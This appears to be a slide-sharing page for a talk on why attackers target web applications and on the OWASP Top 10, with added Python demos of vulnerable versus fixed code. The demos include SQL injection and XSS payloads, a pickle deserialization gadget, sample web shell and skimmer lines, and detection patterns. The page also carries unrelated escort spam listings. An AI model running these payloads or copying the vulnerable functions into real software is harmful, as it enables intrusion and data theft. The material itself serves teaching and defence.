What Makes Web Applications Desirable For Hackers: How To Protect Yours
Jaime Manteiga, CTO / Co-Founder at Venkon
Agenda

01 What Motivates Unethical Hackers? Before asking the "how" it's important to know the "why".
02 What's The Value Of Stolen Data? How They Make Money. Data is the new "gold" and hackers know that: a glance into dark web markets.
03 What Techniques Do Attackers Use? To protect your applications, it is essential to know "how" web application hacking techniques work.
04 How Can We Protect Ourselves? Understanding and thinking like an attacker will give us a new perspective on how to improve our web security posture.
05 References. Sources and citations.
06 Questions? Share your thoughts, fears, and doubts.
Introduction
What Makes Web Applications Desirable For Hackers: How To Protect Yours

Bio
Jaime Manteiga is a dynamic Information Security Professional and Researcher who assists organizations across the world by improving their information security posture and addressing their cybersecurity challenges.
Additionally, as an Information Security Researcher, Jaime Manteiga holds public recognition from organizations such as Tesla, Shopify, United Airlines and Spotify for helping them identify and mitigate information security flaws.

Get in touch (active social media networks):
Jaime Manteiga, CTO / Co-Founder at Venkon
@JaimeManteiga
https://www.linkedin.com/in/jaimemanteiga/
https://medium.com/@jaime.manteiga
jaime.manteiga@Venkon.us
What Motivates Unethical Hackers?
Before asking the "how" it's important to know the "why"

There are hundreds of methods hackers can use to take advantage of the security vulnerabilities in your applications, but there are just a few reasons to do it.

Motivation. These are the top motives, in descending order:
1. Financial gain
2. Espionage
3. Fun
4. Ideology

* Sources of the stats will be exhibited at the references slide
What Motivates Unethical Hackers?
Cybersecurity Breaches, Costs and Facts

2016
- Yahoo: in 2016 Yahoo disclosed one of the biggest breaches of all time, a 2013 intrusion that, as the company later confirmed, affected all 3 billion accounts.
- Uber: Uber reported that hackers stole the information of over 57 million riders and drivers.
2017
- Equifax: 147.9 million consumers were affected by the Equifax breach.
2018
- Under Armour: Under Armour reported that its "MyFitnessPal" app was hacked, affecting 150 million users.
- Marriott Hotels: the Marriott hacking exposed data of up to 500 million guests, including names, addresses, dates of birth, passport numbers, email addresses and phone numbers.

The average cost of a cybersecurity attack on a company is $2.4 million.

- In 2017, cyber crime costs accelerated, with organizations spending nearly 23 percent more than in 2016, on average about $11.7 million.
- The most expensive component of a cyber attack is information loss, which represents 43 percent of costs.
- The average cost per lost or stolen record per individual is $141, but that cost varies per country. Breaches are most expensive in the United States ($225) and Canada ($190).
- In companies with over 50k compromised records, the average cost of a data breach is $6.3 million.
- Damage related to cybercrime is projected to hit $6 trillion annually by 2021.
What Motivates Unethical Hackers?
Marriott Hotels Security Breach, Nov. 30, 2018

Overview
The Marriott breach exposed data of up to 500 million guests. The hotel chain said that personal details including names, addresses, dates of birth, passport numbers, email addresses and phone numbers for hundreds of millions of guests may have been compromised.
In the United States, the New York Attorney General's office said it had opened an investigation into the data breach.
Marriott's (MAR) stock plunged on the news, falling more than 6% in trading. The combined company has 6,700 properties in more than 129 countries.
The next figure illustrates how the stock value was sinking after the incident.
What Techniques Do Attackers Use?

Hacking web applications is nothing new, but the methods used by attackers are constantly changing. Several factors determine which techniques an attacker can attempt in order to compromise your application, such as the programming language, web server version, server operating system, database type, etc. Hence, there is no one answer to which method they will use to compromise your application.
The following illustration represents the paths that attackers can use to discover weaknesses; sometimes it takes multiple paths to compromise an application, depending on its complexity.
What Techniques Do Attackers Use?
OWASP TOP 10 Explained

We summarized a list of the most critical web application security risks following the OWASP Top 10 (Open Web Application Security Project, 2017 edition). This list focuses on identifying the most serious web application security risks for a broad array of organizations and industries.

A1 - Injection
A2 - Broken Authentication
A3 - Sensitive Data Exposure
A4 - XML External Entities (XXE)
A5 - Broken Access Control
A6 - Security Misconfiguration
A7 - Cross-Site Scripting (XSS)
A8 - Insecure Deserialization
A9 - Using Components with Known Vulnerabilities
A10 - Insufficient Logging & Monitoring
What Techniques Do Attackers Use?
OWASP TOP 10 Explained, Part 1

A1 - INJECTION
Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

A2 - BROKEN AUTHENTICATION
Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities temporarily or permanently.

A3 - SENSITIVE DATA EXPOSURE
Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes.

A4 - XML EXTERNAL ENTITIES (XXE)
Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.

A5 - BROKEN ACCESS CONTROL
Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as accessing other users' accounts, viewing sensitive files, modifying other users' data, changing access rights, etc.
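The two risks above that are easiest to see side by side are A1 and A5, so here is an added example written for this page; it is not code from the presentation or from Venkon. The tables, the sample users and orders, and every function name are constructed for the demo. The vulnerable and hardened version of each operation sit next to each other; note that the A5 lookup is already injection-safe and is still broken, because the two risks are independent.

```python
import sqlite3

# Constructed sample data for the demo (not from the original presentation).
USERS = [
    (1, "alice", "alice@example.com"),
    (2, "bob", "bob@example.com"),
    (3, "carol", "carol@example.com"),
]
ORDERS = [
    (100, 1, "laptop"),   # belongs to alice
    (101, 2, "phone"),    # belongs to bob
    (102, 2, "tablet"),   # belongs to bob
]


def make_db():
    """Build an in-memory SQLite database holding the sample users and orders."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, user_id INTEGER, item TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)", ORDERS)
    return conn


# --- A1: Injection ----------------------------------------------------------

def find_user_vulnerable(conn, name):
    """User input is pasted into the SQL text, so the input can rewrite the query."""
    sql = "SELECT id, name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    """Parameterised query: the driver passes the value separately from the SQL,
    so quotes and keywords inside it are treated as data, never as syntax."""
    return conn.execute(
        "SELECT id, name, email FROM users WHERE name = ?", (name,)
    ).fetchall()


# --- A5: Broken Access Control ---------------------------------------------

def get_order_vulnerable(conn, current_user_id, order_id):
    """Parameterised (no injection), but nothing ties the order to the logged-in
    user, so any authenticated user can read any order by changing the id."""
    return conn.execute(
        "SELECT id, user_id, item FROM orders WHERE id = ?", (order_id,)
    ).fetchone()


def get_order_safe(conn, current_user_id, order_id):
    """Ownership is enforced inside the query: an order that does not belong to
    the caller simply does not exist from the caller's point of view."""
    return conn.execute(
        "SELECT id, user_id, item FROM orders WHERE id = ? AND user_id = ?",
        (order_id, current_user_id),
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "x' OR '1'='1"                   # classic tautology payload
    print(find_user_vulnerable(db, payload))   # every user comes back
    print(find_user_safe(db, payload))         # []: nobody is literally named that
    print(get_order_vulnerable(db, 1, 101))    # alice reads bob's order
    print(get_order_safe(db, 1, 101))          # None
```

The access-control fix is deliberately in the query rather than in a check after the fetch: filtering by the authenticated user's id at the data layer means there is no code path that returns someone else's row and then forgets to check it.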
What Techniques Do Attackers Use?
OWASP TOP 10 Explained, Part 2

A6 - SECURITY MISCONFIGURATION
Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information.

A7 - CROSS-SITE SCRIPTING (XSS)
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript.

A8 - INSECURE DESERIALIZATION
Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.

A9 - USING COMPONENTS WITH KNOWN VULNERABILITIES
Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover.

A10 - INSUFFICIENT LOGGING & MONITORING
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper with, extract, or destroy data.
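A7 and A8 are both cases of handing untrusted bytes to a parser that does more than the developer expected. The following is an added example for this page, not code from the presentation: the comment strings, the profile format, the `Gadget` class and every function name are constructed for the demo. For A8 the callable planted in the pickle stream is `os.getcwd`, which stands in for the `os.system` an attacker would name; the point is that `pickle.loads` runs whatever the stream names before it returns anything, and the class used to build the stream does not need to exist on the target.

```python
import html
import json
import os
import pickle

# --- A7: Cross-Site Scripting ----------------------------------------------

def render_comment_vulnerable(comment):
    """Untrusted text is concatenated straight into the HTML, so markup in the
    comment becomes markup in the page."""
    return '<p class="comment">' + comment + "</p>"


def render_comment_safe(comment):
    """Output encoding for the HTML-text context: html.escape turns < > & " '
    into entities, so the browser renders the text instead of parsing it."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


# --- A8: Insecure Deserialization ------------------------------------------

class Gadget:
    """Any object can tell pickle to call a function when it is loaded. The
    stream records only the callable's name and arguments, so the attacker
    builds it on their machine and the victim never needs this class."""

    def __reduce__(self):
        # Constructed demo: os.getcwd stands in for os.system(...) or similar.
        return (os.getcwd, ())


def build_untrusted_blob():
    """What an attacker would send where the app expects a pickled session/profile."""
    return pickle.dumps(Gadget())


def load_profile_vulnerable(blob):
    """pickle.loads executes the callable named in the stream and returns its
    result; with os.system in the stream this is remote code execution."""
    return pickle.loads(blob)


ALLOWED_KEYS = {"name", "theme"}   # constructed schema for the demo


def load_profile_safe(blob):
    """Use a data-only format and validate the shape before trusting it.
    JSON can only ever produce dicts, lists, strings, numbers and booleans."""
    data = json.loads(blob.decode("utf-8"))
    if not isinstance(data, dict) or not set(data) <= ALLOWED_KEYS:
        raise ValueError("unexpected profile structure")
    if not all(isinstance(value, str) for value in data.values()):
        raise ValueError("profile values must be strings")
    return data


def current_directory():
    """Helper so a caller can confirm that loading the blob really ran os.getcwd."""
    return os.getcwd()


if __name__ == "__main__":
    print(render_comment_vulnerable("<script>alert(1)</script>"))
    print(render_comment_safe("<script>alert(1)</script>"))
    print(load_profile_vulnerable(build_untrusted_blob()) == current_directory())  # True
    print(load_profile_safe(b'{"name": "alice", "theme": "dark"}'))
```

`html.escape` is correct only for the HTML-text and quoted-attribute contexts; data placed into a URL, a `<script>` block or a CSS value needs the encoder for that context, which is why the OWASP wording above says "proper validation or escaping" rather than naming one function.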
What's The Value Of Stolen Data? How They Make Money

We already know that the principal motivation for hackers is financial gain. To learn in more detail how much money they make and how they sell the stolen data, we have to examine their communication channels.
There are several ways for hackers to communicate, sell and exchange, but the most used is the Tor network and the hidden services reachable through it, commonly called the "dark web". Tor itself is an anonymity network with many legitimate users; what matters here is that its hidden services are hard to trace and to take down, which is why cybercriminal forums and marketplaces congregate there. (The "deep web" is a broader term for any content that search engines do not index and is not the same thing.)
Taking a Dive Into The "Deep Web"

Dark web forums are one of the places where cybercriminals trade their goods. They use underground forums as a safe interface to advertise their products and services. It is extremely challenging to get access to most of these forums since they require extensive vetting and trust from other cybercriminals.
For this presentation, we took a "safe dive" into the dark web with the purpose of examining cybercriminals' trading methods:

Figure 1 – Most of the forums were either taken down or seized by international organizations such as the FBI, Interpol, Europol, and the DEA. It is pleasing to find that international government collaboration is in place to protect us from cybercriminals.
Figure 2 – As previously mentioned, it is tough to get access to these forums. The figure above lists the rules for access to the "unrestricted areas" of this forum.
Figure 3 – We found another forum that used to have "free registration"; now you are required to be invited by a current member and to pay a membership fee.
Figure 4 – After an intensive research period, we were able to get access to one of the less frequented marketplace forums for cybercriminals. In this figure, we can appreciate a few things:
1. The principal payment method used by cybercriminals is the cryptocurrency Bitcoin.
2. Stolen data is somewhat cheaper than expected: about $10 USD for millions of stolen Dropbox records.
3. Cybercriminal marketplaces are mostly organized.
This database appears to be from the security breach reported by Dropbox in 2016; back then cybercriminals were selling this information for around $1500 USD.
Cybercriminals' Marketplace For Web Applications

After our investigation in the deep web, we concluded that cybercriminals find our web applications very valuable and profitable. Below is a list of the services most offered by cybercriminals:

Web Shells: this method provides direct access to your application, which allows them to resell it.
Distributed Malware: they modify the integrity of the code to distribute malware to the users using an exploit kit.
Credit Card Scraping: for applications handling payments, injected code captures the entered credit card data and then stores it in a local file for the hackers to access.
Crypto Mining: installing JS code in your application allows the cybercriminals to start mining cryptocurrencies for themselves.
Redirecting Traffic: they sell redirection of your application's traffic to other cybercriminals.
Database: they download a copy of the database to categorize and sell the information afterward.
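Every service in the list above except the database dump works by planting or altering code on the server: a shell, an injected script tag, a skimmer, a miner. One control that catches all of them regardless of the technique is file integrity monitoring: hash a known-good deployment, keep the hashes outside the web root, and diff the live tree against them. The following is an added example for this page, not the presentation's own material; the file tree, the "compromised" contents, the function names and the pattern list are all constructed for the demo, and the patterns are illustrative starting points rather than a complete signature set.

```python
import hashlib

# Constructed known-good deployment: path -> file contents (demo data only).
BASELINE_FILES = {
    "index.php": "<?php echo 'Welcome'; ?>",
    "js/app.js": "document.addEventListener('DOMContentLoaded', init);",
    "checkout.php": "<?php process_payment($_POST); ?>",
}

# Constructed "after compromise" tree: an injected script tag (miner / malware
# distribution), a skimmer writing card data to disk, and a dropped web shell.
COMPROMISED_FILES = {
    "index.php": BASELINE_FILES["index.php"]
    + '<script src="https://cdn.example/m.js"></script>',
    "js/app.js": BASELINE_FILES["js/app.js"],
    "checkout.php": "<?php process_payment($_POST); "
    "file_put_contents('/tmp/.c', $_POST['card']); ?>",
    "uploads/.cache.php": "<?php eval(base64_decode($_POST['x'])); ?>",
}

# Illustrative content patterns (label, substring). Real deployments would use a
# maintained rule set; these only show how a content scan complements hashing.
SUSPICIOUS_PATTERNS = [
    ("web shell", "eval(base64_decode("),
    ("web shell", "shell_exec($_"),
    ("possible skimmer", "file_put_contents('/tmp"),
    ("external script", '<script src="http'),
]


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_baseline(files):
    """Hash every file of a known-good deployment. Store the result somewhere the
    web process cannot write, otherwise an attacker simply updates the baseline."""
    return {path: sha256_hex(content) for path, content in files.items()}


def check_integrity(baseline, current_files):
    """Compare the live tree against the baseline; returns (change, path) pairs."""
    findings = []
    for path, content in current_files.items():
        if path not in baseline:
            findings.append(("added", path))
        elif baseline[path] != sha256_hex(content):
            findings.append(("modified", path))
    for path in baseline:
        if path not in current_files:
            findings.append(("deleted", path))
    return findings


def scan_for_patterns(files, patterns=SUSPICIOUS_PATTERNS):
    """Content scan for the cases hashing cannot judge (e.g. a legitimately
    edited file); returns (label, path) pairs."""
    hits = []
    for path, content in files.items():
        for label, needle in patterns:
            if needle in content:
                hits.append((label, path))
    return hits


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_FILES)
    for finding in check_integrity(baseline, COMPROMISED_FILES):
        print("integrity:", finding)
    for hit in scan_for_patterns(COMPROMISED_FILES):
        print("pattern:", hit)
```

The hash comparison is the authoritative signal: it needs no knowledge of what the attacker wrote, only of what the deployment should contain. The pattern scan is a second, weaker opinion for triage. A practical deployment runs this from a cron job or CI step against the release artifact, so that any file the web server's own user can write to (uploads, caches) is treated as untrusted by default.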
How Can We Protect Ourselves?

Unethical hackers are restlessly trying to compromise web applications, and if we don't want to become one of their victims posted on the dark web, we must ensure that our systems are appropriately secured.
There is more profitability in our web applications than we expected, even if no valuable data is present. Cybercriminals will use compromised web apps for a variety of things; needless to say, all actions of cybercriminals regarding our apps will affect us significantly.

Recommendations For Improvements
Sadly, there is no "one answer"; it depends on several factors that apply to the specific requirements of your application and organization. The good news is, as we previously mentioned, OWASP (Open Web Application Security Project) maintains updated guidelines created by industry experts and leading organizations to help ensure your application is properly secured. Below are some recommended steps for improvement:

OWASP: OWASP has countless guidelines and best-practice documents to improve your application's overall security posture.
OWASP TOP 10: this is the best foundation when testing for security issues. Ensure that your tests cover at least these ten risk categories; the Top 10 is an awareness list rather than a complete test plan, so complement it with a fuller OWASP methodology such as the Testing Guide or the Application Security Verification Standard (ASVS).
Security Scanning: formalize a process to perform regular automated and manual security scans.
Formalize a Software Development Lifecycle (SDLC): reduce security issues and raise the overall security level at every stage of your application development.
Implement a Web Application Firewall: a WAF inspects every HTTP request and response at the application layer to identify and block malicious content. It is a compensating control that buys time; it does not fix the underlying vulnerability in the code.
Independent Security Assessment: perform regular web application security assessments using an independent contractor. This provides a degree of autonomy to test controls that you could be missing and an external view of potential security risks.
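A concrete piece of the "Security Scanning" step above, and of the misconfigured-HTTP-headers item under A6, is a check of the headers a server sends back. The following is an added example for this page, not from the presentation: the two header sets are constructed, `check_headers` is a hypothetical function name, and in practice the dictionary would be filled from a real response (for instance `urllib.request.urlopen(url).headers`) rather than hard-coded.

```python
# Constructed response headers, as a scanner would see them (demo data only).
WEAK_RESPONSE = {
    "Server": "Apache/2.4.29 (Ubuntu)",      # version banner
    "X-Powered-By": "PHP/7.2.24",            # version banner
    "Content-Type": "text/html; charset=utf-8",
    "Set-Cookie": "PHPSESSID=abc123; Path=/",   # session cookie without flags
}

HARDENED_RESPONSE = {
    "Server": "web",
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "Set-Cookie": "PHPSESSID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
}

# Headers whose absence is reported. Names are compared case-insensitively
# because HTTP header names are.
REQUIRED_HEADERS = (
    "strict-transport-security",
    "content-security-policy",
    "x-content-type-options",
    "x-frame-options",
)
BANNER_HEADERS = ("server", "x-powered-by")
REQUIRED_COOKIE_FLAGS = ("secure", "httponly")


def check_headers(headers):
    """Return a list of human-readable findings for one HTTP response."""
    lowered = {name.lower(): value for name, value in headers.items()}
    findings = []

    for name in REQUIRED_HEADERS:
        if name not in lowered:
            findings.append(f"missing {name}")

    # A banner that contains digits almost always carries a version string,
    # which hands an attacker the exact release to look up known CVEs for.
    for name in BANNER_HEADERS:
        value = lowered.get(name, "")
        if any(ch.isdigit() for ch in value):
            findings.append(f"{name} discloses a version: {value}")

    cookie = lowered.get("set-cookie")
    if cookie:
        # Attributes follow the first "name=value" pair, separated by ";".
        attrs = {part.strip().split("=")[0].lower() for part in cookie.split(";")[1:]}
        for flag in REQUIRED_COOKIE_FLAGS:
            if flag not in attrs:
                findings.append(f"set-cookie without {flag}")

    return findings


if __name__ == "__main__":
    for finding in check_headers(WEAK_RESPONSE):
        print("weak:", finding)
    print("hardened:", check_headers(HARDENED_RESPONSE))   # []
```

Run against every public endpoint on a schedule and diff the output between runs: a header that disappears after a deployment is exactly the "incomplete or ad hoc configuration" the A6 description warns about.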
References
Below are the sources and citations used in this presentation:

2018 Official Data Breach Investigations Report from Verizon: https://enterprise.verizon.com/resources/reports/dbir/
2016 Uber Data Breach: https://www.uber.com/newsroom/2016-data-incident/
2017 Equifax Data Breach: https://www.equifaxsecurity2017.com/2018/03/01/equifax-releases-updated-information-2017-cybersecurity-incident/
2018 Under Armour Data Breach: http://investor.underarmour.com/releasedetail.cfm?ReleaseID=1062368
Average cost of a data breach (Accenture): https://www.accenture.com/us-en/event-cybertech-europe-2017?src=SOMS#block-insights-and-innovation
2016 Yahoo Data Breach: https://www.oath.com/press/yahoo-provides-notice-to-additional-users-affected-by-previously/
2018 Marriott Hotels Data Breach: http://news.marriott.com/2018/11/marriott-announces-starwood-guest-reservation-database-security-incident/
OWASP Top 10 - 2017: https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
THANKS FOR WATCHING
Questions, Thoughts, Fears or Doubts?
@JaimeManteiga
https://www.linkedin.com/in/jaimemanteiga/
https://medium.com/@jaime.manteiga
jaime.manteiga@Venkon.us

(8264348440) 🔝 Call Girls In Green Park 🔝 Delhi NCR
 
Call Girls in Tilak Nagar (DELHI-) 8377877756 Call Girls Service
Call Girls in Tilak Nagar (DELHI-) 8377877756 Call Girls ServiceCall Girls in Tilak Nagar (DELHI-) 8377877756 Call Girls Service
Call Girls in Tilak Nagar (DELHI-) 8377877756 Call Girls Service
 
Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...
Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...
Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...
 
Hot Sexy call girls in Rajouri Garden🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in  Rajouri Garden🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in  Rajouri Garden🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rajouri Garden🔝 9953056974 🔝 Delhi escort Service
 
Call Girls At-( Nearby )-Bhikaji Cama Place, Delhi | ⑧③77⓿⑧76⓿7
Call Girls At-( Nearby )-Bhikaji Cama Place, Delhi | ⑧③77⓿⑧76⓿7Call Girls At-( Nearby )-Bhikaji Cama Place, Delhi | ⑧③77⓿⑧76⓿7
Call Girls At-( Nearby )-Bhikaji Cama Place, Delhi | ⑧③77⓿⑧76⓿7
 
Guwahati Call Girls 7001305949 WhatsApp Number 24x7 Best Services
Guwahati Call Girls 7001305949 WhatsApp Number 24x7 Best ServicesGuwahati Call Girls 7001305949 WhatsApp Number 24x7 Best Services
Guwahati Call Girls 7001305949 WhatsApp Number 24x7 Best Services
 
Delhi Munirka 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex call girl
Delhi Munirka 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex call girlDelhi Munirka 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex call girl
Delhi Munirka 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex call girl
 
Product Catalog Bandung Home Decor Design Furniture
Product Catalog Bandung Home Decor Design FurnitureProduct Catalog Bandung Home Decor Design Furniture
Product Catalog Bandung Home Decor Design Furniture
 
Report about the AHIABGA-UnityNet UNDRIPDay / Earth-Day 2024 Gathering in Mar...
Report about the AHIABGA-UnityNet UNDRIPDay / Earth-Day 2024 Gathering in Mar...Report about the AHIABGA-UnityNet UNDRIPDay / Earth-Day 2024 Gathering in Mar...
Report about the AHIABGA-UnityNet UNDRIPDay / Earth-Day 2024 Gathering in Mar...
 
Cheap Rate ➥8448380779 ▻Call Girls In Sector 56 Gurgaon
Cheap Rate ➥8448380779 ▻Call Girls In Sector 56 GurgaonCheap Rate ➥8448380779 ▻Call Girls In Sector 56 Gurgaon
Cheap Rate ➥8448380779 ▻Call Girls In Sector 56 Gurgaon
 
Viet Nam Inclusive Business Accreditation System
Viet Nam Inclusive Business Accreditation SystemViet Nam Inclusive Business Accreditation System
Viet Nam Inclusive Business Accreditation System
 
(8264348440) 🔝 Call Girls In Sriniwaspuri 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Sriniwaspuri 🔝 Delhi NCR(8264348440) 🔝 Call Girls In Sriniwaspuri 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Sriniwaspuri 🔝 Delhi NCR
 
Pakistani Jumeirah Call Girls # +971559085003 # Pakistani Call Girls In Jumei...
Pakistani Jumeirah Call Girls # +971559085003 # Pakistani Call Girls In Jumei...Pakistani Jumeirah Call Girls # +971559085003 # Pakistani Call Girls In Jumei...
Pakistani Jumeirah Call Girls # +971559085003 # Pakistani Call Girls In Jumei...
 
Model Call Girl in Bawana Delhi reach out to us at 🔝8264348440🔝
Model Call Girl in Bawana Delhi reach out to us at 🔝8264348440🔝Model Call Girl in Bawana Delhi reach out to us at 🔝8264348440🔝
Model Call Girl in Bawana Delhi reach out to us at 🔝8264348440🔝
 
About Entrepreneur ELON MUSK .pptx...
About  Entrepreneur  ELON  MUSK .pptx...About  Entrepreneur  ELON  MUSK .pptx...
About Entrepreneur ELON MUSK .pptx...
 
(8264348440) 🔝 Call Girls In Safdarjung Enclave 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Safdarjung Enclave 🔝 Delhi NCR(8264348440) 🔝 Call Girls In Safdarjung Enclave 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Safdarjung Enclave 🔝 Delhi NCR
 
Why Powderless DTF Printer is T-shirt Printing Game Changer.pptx
Why Powderless DTF Printer is T-shirt Printing Game Changer.pptxWhy Powderless DTF Printer is T-shirt Printing Game Changer.pptx
Why Powderless DTF Printer is T-shirt Printing Game Changer.pptx
 
TDC Health Limited Nigeria Business Plan Opportunity Presentation 2024
TDC Health Limited Nigeria Business Plan Opportunity Presentation 2024TDC Health Limited Nigeria Business Plan Opportunity Presentation 2024
TDC Health Limited Nigeria Business Plan Opportunity Presentation 2024
 
Gurgaon Rajiv Chowk 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex ...
Gurgaon Rajiv Chowk 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex ...Gurgaon Rajiv Chowk 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex ...
Gurgaon Rajiv Chowk 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex ...
 
young call girls in kailash Nagar, 🔝 9953056974 🔝 escort Service
young call girls in kailash Nagar, 🔝 9953056974 🔝 escort Serviceyoung call girls in kailash Nagar, 🔝 9953056974 🔝 escort Service
young call girls in kailash Nagar, 🔝 9953056974 🔝 escort Service
 

What Makes Web Applications Desirable For Hackers

  • 5. What Motivates Unethical Hackers?
    Cybersecurity Breaches, Costs and Facts
    (* Sources of the stats are exhibited on the references slide)
    Breach timeline, 2016 to 2018:
    - Yahoo: In 2016, 3 billion Yahoo accounts were hacked in one of the biggest breaches of all time.
    - Uber: Uber reported that hackers stole the information of over 57 million riders and drivers.
    - Equifax: 147.9 million consumers were affected by the Equifax breach.
    - Under Armour: Under Armour reported that its “My Fitness Pal” app was hacked, affecting 150 million users.
    - Marriott Hotels: Marriott hacking exposes data of up to 500 million guests, including names, addresses, dates of birth, passport numbers, email addresses and phone numbers.
    The average cost of a cybersecurity attack on a company is $2.4 million.
    - In 2017, cyber crime costs accelerated, with organizations spending nearly 23 percent more than in 2016 — on average about $11.7 million.
    - The most expensive component of a cyber attack is information loss, which represents 43 percent of costs.
    - The average cost per lost or stolen record per individual is $141 — but that cost varies per country. Breaches are most expensive in the United States ($225) and Canada ($190).
    - In companies with over 50k compromised records, the average cost of a data breach is $6.3 million.
    - Damage related to cybercrime is projected to hit $6 trillion annually by 2021.
  • 6. What Motivates Unethical Hackers?
    Marriott Hotels Security Breach (Nov. 30, 2018)
    Overview: Marriott breach exposes data of up to 500 million guests. The hotel chain said that personal details including names, addresses, dates of birth, passport numbers, email addresses and phone numbers for hundreds of millions of guests may have been compromised. In the United States, the New York Attorney General's office said it had opened an investigation into the data breach. Marriott's (MAR) stock is plunging on the news, falling more than 6% in trading. The combined company has 6,700 properties in more than 129 countries. The next figure illustrates how the stock value was sinking after the incident.
  • 7. What Techniques Do Attackers Use?
    Hacking web applications is nothing new, but the methods used by attackers are constantly changing. Several factors determine which techniques an attacker can attempt in order to compromise your application, such as the programming language, web server version, server operating system, database type, etc. Hence, there is no single answer to which method they will use to compromise your application. The following illustration represents the paths that attackers can use to discover weaknesses; sometimes it takes multiple paths to compromise an application, depending on its complexity.
  • 8. What Techniques Do Attackers Use?
    OWASP TOP 10 Explained
    We summarized a list of the most critical web application security risks following the OWASP Top 10 (Open Web Application Security Project). This list focuses on identifying the most serious web application security risks for a broad array of organizations and industries.
    - A1 - Injection
    - A2 - Broken Authentication
    - A3 - Sensitive Data Exposure
    - A4 - XML External Entities (XXE)
    - A5 - Broken Access Control
    - A6 - Security Misconfiguration
    - A7 - Cross-Site Scripting (XSS)
    - A8 - Insecure Deserialization
    - A9 - Using Components with Known Vulnerabilities
    - A10 - Insufficient Logging & Monitoring
  • 9. What Techniques Do Attackers Use?
    OWASP TOP 10 Explained, Part 1
    A1 - INJECTION: Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
    A2 - BROKEN AUTHENTICATION: Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.
    A3 - SENSITIVE DATA EXPOSURE: Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes.
    A4 - XML EXTERNAL ENTITIES (XXE): Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
    A5 - BROKEN ACCESS CONTROL: Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as accessing other users' accounts, viewing sensitive files, modifying other users’ data, changing access rights, etc.
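As an added illustration of A1 and A5 (example code, not part of the original deck), the following Python snippet puts a string-built query next to its parameterized form and an unchecked object lookup next to one that enforces ownership. The in-memory tables, rows and function names are constructed for the example.

```python
import sqlite3


# Constructed in-memory schema and rows for the example (not a real application).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, owner_id INTEGER, item TEXT)")
    conn.executemany("INSERT INTO users (name, email) VALUES (?, ?)",
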